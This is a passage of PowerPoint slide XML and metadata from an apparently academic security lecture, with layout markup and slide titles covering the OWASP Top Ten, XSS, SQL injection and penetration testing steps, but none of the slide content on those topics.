        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="5257800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2362200"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14348" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7848600" y="3276600"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>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nb-NO" altLang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14349" name="Picture 11" descr="CompaqAlphaServerES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2228851"/>
            <a:ext cx="1155700"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0" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4708526" y="2619375"/>
            <a:ext cx="1001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nb-NO"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Cloud Callout 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="3981450"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -186846"/>
              <a:gd name="adj2" fmla="val 43949"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14352" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6443663" y="3748088"/>
            <a:ext cx="492125" cy="12065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53" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5780088" y="4743450"/>
            <a:ext cx="457200" cy="17145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pic>
        <p:nvPicPr>
          <p:cNvPr id="14354" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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4252914"/>
            <a:ext cx="1436688"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itle 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Web security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4624848B-1282-8736-D19C-114111E1A255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{88C13698-C10E-4192-9343-443A42954B58}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E792F3A-6C3E-2FAB-51B1-1BACA673CCBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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575469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MPTYTAG" val="EmptyTag"/>
  <p:tag name="04/16/2010" val="LastModified"/>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_SE2019s1">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Theme_SE2019s1" id="{E4EA5176-60B7-4738-A39A-85EA610AC46B}" vid="{8416C537-BC8A-42C5-99D5-28933A3097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Theme_SE2019s1</Template>
  <TotalTime>5968</TotalTime>
  <Words>1753</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>228</Paragraphs>
  <Slides>28</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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Theme_SE2019s1</vt:lpstr>
      <vt:lpstr>Chapter 12 – Advanced topics</vt:lpstr>
      <vt:lpstr>Puzzle – What is this?</vt:lpstr>
      <vt:lpstr>Answer</vt:lpstr>
      <vt:lpstr>Do you know?</vt:lpstr>
      <vt:lpstr>Security properties</vt:lpstr>
      <vt:lpstr>General picture</vt:lpstr>
      <vt:lpstr>General picture</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OWASP Top Ten LIST</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>More Dangerous SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Malicious File Execution</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerability assessment</vt:lpstr>
      <vt:lpstr>Two options</vt:lpstr>
      <vt:lpstr>Penetration testing (PENTEST)</vt:lpstr>
      <vt:lpstr>PENTEST vs. Vulnerability assessment</vt:lpstr>
      <vt:lpstr>PENTEST - STEPS</vt:lpstr>
      <vt:lpstr>PENTEST - STEPS</vt:lpstr>
      <vt:lpstr>PENTEST - STEPS</vt:lpstr>
      <vt:lpstr>PENTEST - STEPS</vt:lpstr>
      <vt:lpstr>Exercise</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>HCMUT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 chap 1. Intro</dc:title>
  <dc:creator>Thang Bui</dc:creator>
  <cp:lastModifiedBy>Anh Nguyen Duc</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-12-29T10:39:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-23T08:33:49Z</dcterms:modified>
</cp:coreProperties>
</file>